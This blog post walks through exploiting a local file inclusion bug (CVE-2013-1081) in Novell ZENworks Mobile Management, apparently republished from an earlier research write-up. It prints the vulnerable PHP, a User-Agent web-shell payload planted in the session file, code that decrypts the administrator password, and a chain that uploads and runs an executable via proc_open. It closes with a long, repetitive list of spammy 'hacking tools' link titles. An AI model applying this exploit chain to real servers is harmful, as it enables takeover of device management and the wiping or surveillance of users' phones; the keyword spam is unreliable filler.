Thursday, August 20, 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

More information


  1. How To Install Pentest Tools In Ubuntu
  2. Pentest Tools Nmap
  3. Ethical Hacker Tools
  4. Hack And Tools
  5. Pentest Tools Framework
  6. Hacking Tools For Kali Linux
  7. Hacker Tools 2019
  8. Hacking Tools Github
  9. Pentest Box Tools Download
  10. Hacker Tools Free
  11. Hacking Tools Hardware
  12. Hacking App
  13. Hackrf Tools
  14. Pentest Tools Review
  15. Hacker Tools Mac
  16. Tools For Hacker
  17. Hacker Tools Mac
  18. Pentest Tools Find Subdomains
  19. Hacking Tools Windows
  20. Pentest Tools Android
  21. Pentest Tools Port Scanner
  22. Hack Tools
  23. Nsa Hacker Tools
  24. Pentest Tools Apk
  25. Hack Tools For Games
  26. Hacking Tools And Software
  27. What Is Hacking Tools
  28. Pentest Tools Kali Linux
  29. Best Hacking Tools 2019
  30. How To Install Pentest Tools In Ubuntu
  31. Tools Used For Hacking
  32. Hak5 Tools
  33. Hacker Tools Hardware
  34. Hacker Techniques Tools And Incident Handling
  35. Pentest Tools
  36. Pentest Tools Find Subdomains
  37. Hacking Tools Software
  38. Pentest Reporting Tools
  39. Hacker Tools Apk
  40. Hacking Tools Mac
  41. How To Install Pentest Tools In Ubuntu
  42. Game Hacking
  43. Hacking Tools Hardware
  44. Wifi Hacker Tools For Windows
  45. Hack Tools 2019
  46. Pentest Tools Framework
  47. Hack Tools Download
  48. What Are Hacking Tools
  49. Hack Apps
  50. Hacks And Tools
  51. Pentest Reporting Tools
  52. Hacker Tools Free
  53. What Are Hacking Tools
  54. Hacker Tools For Pc
  55. Free Pentest Tools For Windows
  56. Hacker Tools Free Download
  57. Install Pentest Tools Ubuntu
  58. Hacking Tools Mac
  59. Hack Tools
  60. Underground Hacker Sites
  61. Nsa Hacker Tools
  62. Hack Tool Apk
  63. How To Install Pentest Tools In Ubuntu
  64. Hacking Tools For Windows
  65. Hacker Tools Github
  66. Hacker
  67. Hacking Tools For Windows Free Download
  68. Hackers Toolbox
  69. Hacker Tools List
  70. Hack Tools For Pc
  71. Hacker Tools For Windows
  72. Hacking Tools For Pc
  73. Hacker Tools Mac
  74. Pentest Tools Android
  75. Pentest Tools Review
  76. Pentest Tools List
  77. Pentest Tools Url Fuzzer
  78. Free Pentest Tools For Windows
  79. Pentest Tools Website
  80. New Hack Tools
  81. Hacker Tools 2019
  82. Hacking Tools For Windows 7
  83. Pentest Tools For Android
  84. Computer Hacker
  85. Pentest Tools List
  86. Underground Hacker Sites
  87. Ethical Hacker Tools
  88. Hack Tool Apk
  89. Pentest Tools Review
  90. Computer Hacker
  91. Hacking Tools Pc
  92. Pentest Tools Framework
  93. Pentest Tools Port Scanner
  94. Hacker Tools Free
  95. Pentest Tools Framework
  96. Hacker Tools Free Download
  97. Hacking App
  98. Pentest Tools For Mac
  99. Pentest Tools Free
  100. Hack Tools Mac
  101. Pentest Tools For Ubuntu
  102. Pentest Tools Nmap
  103. Hacker Security Tools
  104. Top Pentest Tools
  105. Pentest Tools Github
  106. Hack Tools For Ubuntu
  107. Hack Tools For Games
  108. Usb Pentest Tools
  109. Pentest Tools Port Scanner
  110. Hacking Tools
  111. What Are Hacking Tools
  112. Usb Pentest Tools
  113. Hacker Hardware Tools
  114. Tools Used For Hacking
  115. Bluetooth Hacking Tools Kali
  116. Hack Tools For Mac
  117. Game Hacking
  118. Hacker Tools 2020
  119. Hacker Security Tools
  120. Pentest Tools Framework
  121. Pentest Tools Website Vulnerability
  122. Pentest Tools Alternative
  123. Pentest Tools For Windows
  124. Hak5 Tools
  125. Wifi Hacker Tools For Windows
  126. Hack Tool Apk No Root
  127. What Are Hacking Tools
  128. Hack Tools For Pc
  129. Hacker Tools Free Download
  130. Hacks And Tools
  131. Hacking Tools 2019
  132. Pentest Tools Find Subdomains
  133. Hack Tools 2019
  134. Hack And Tools
  135. Pentest Tools For Ubuntu
  136. Hacker Tools List
  137. Pentest Tools Download
  138. Pentest Tools Apk
  139. Free Pentest Tools For Windows
  140. Tools 4 Hack
  141. Install Pentest Tools Ubuntu
  142. Pentest Tools
  143. Hacking Tools For Windows
  144. Hacker Tools Windows
  145. Hackers Toolbox
  146. Hack Tool Apk
  147. Hacking Tools Name
  148. Pentest Tools Website
  149. Hack Tools For Mac
  150. Hack Tools
  151. Pentest Box Tools Download

No comments: